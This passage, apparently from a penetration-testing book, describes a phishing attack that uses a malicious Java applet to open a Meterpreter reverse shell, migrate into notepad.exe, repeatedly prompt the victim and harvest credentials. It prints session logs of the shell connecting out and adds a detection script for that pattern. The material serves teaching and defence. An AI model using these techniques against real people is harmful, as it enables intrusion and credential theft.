156

Chapter 10

Figure 10-6: Multi-attack security warning

We have a backup attack, however. The target clicks Run on the malicious Java applet, a Meterpreter shell begins, and the target is redirected back to the original Gmail page. The attack is successful.

Notice that when using the Java applet, we automatically migrate to a separate process, which happens to be notepad.exe. Because of this, if the target closes the browser, our attack will continue, because closing the browser won’t terminate the process hosting our Meterpreter shell. Also, within the configuration file you can set the “Java Repeater” option, which will continue to prompt the target with the Java applet warning even if he clicks Cancel. This makes it more likely that the target will click the Run button.

The Meterpreter shell is presented to us once a successful exploit is performed, as shown below.

[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1333) at Thu Sep 09 12:33:20 -0400 2010
[*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: java.exe (824)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3044
[*] New server process: notepad.exe (3044)
msf exploit(ms09_002_memory_corruption) >
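The session output above leaves two traces a defender can look for: a browser-plugin JVM (java.exe) spawning a host process such as notepad.exe, and that notepad.exe then holding an outbound connection on 443. The following detection logic is an added example, not code from the book or from Metasploit; the process and network event records are constructed samples modelled on the session above, and the image and parent lists are assumptions to be tuned for a given estate.

```python
"""Flag the migrate-into-notepad.exe pattern from constructed endpoint telemetry."""
from collections import namedtuple

ProcEvent = namedtuple("ProcEvent", "pid image parent_pid parent_image")
NetEvent = namedtuple("NetEvent", "pid image dest_ip dest_port")

# Constructed sample telemetry mirroring the session in the text:
# java.exe (824) spawns notepad.exe (3044), which then connects to 172.16.32.129:443.
SAMPLE_PROCS = [
    ProcEvent(824, "java.exe", 600, "iexplore.exe"),       # browser plugin JVM (constructed parent)
    ProcEvent(3044, "notepad.exe", 824, "java.exe"),        # the spawned host process
    ProcEvent(4100, "notepad.exe", 1200, "explorer.exe"),   # benign: user opened Notepad
]
SAMPLE_NET = [
    NetEvent(3044, "notepad.exe", "172.16.32.129", 443),    # reverse connection to the handler
    NetEvent(2200, "chrome.exe", "203.0.113.10", 443),      # benign browser traffic (constructed)
]

# Assumption: images that have no legitimate reason to open sockets in this environment.
NO_NETWORK_IMAGES = {"notepad.exe", "calc.exe", "mspaint.exe"}
# Assumption: plugin JVMs that should not be launching such host processes.
SUSPICIOUS_PARENTS = {"java.exe", "javaw.exe"}


def find_suspicious_spawns(procs):
    """Return pids of no-network host images launched by a plugin JVM parent."""
    return [p.pid for p in procs
            if p.image.lower() in NO_NETWORK_IMAGES
            and p.parent_image.lower() in SUSPICIOUS_PARENTS]


def find_unexpected_network(net_events):
    """Return (pid, 'ip:port') pairs where a no-network image opened a connection."""
    return [(n.pid, f"{n.dest_ip}:{n.dest_port}") for n in net_events
            if n.image.lower() in NO_NETWORK_IMAGES]


def correlate(procs, net_events):
    """A pid hit by both rules is a high-confidence migration alert; return them sorted."""
    spawned = set(find_suspicious_spawns(procs))
    connected = {pid for pid, _ in find_unexpected_network(net_events)}
    return sorted(spawned & connected)


if __name__ == "__main__":
    print("suspicious spawns:", find_suspicious_spawns(SAMPLE_PROCS))
    print("unexpected network:", find_unexpected_network(SAMPLE_NET))
    print("migration alerts:", correlate(SAMPLE_PROCS, SAMPLE_NET))
```

The benign notepad.exe started from explorer.exe is not flagged, and only the pid that both came from java.exe and opened a socket reaches the correlated alert.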

Now let’s say that this attack fails, and the target clicks Cancel (without the repeater option enabled). He would then be prompted to enter his username and password into the username and password fields, allowing you to successfully harvest the credentials on the website and still have a successful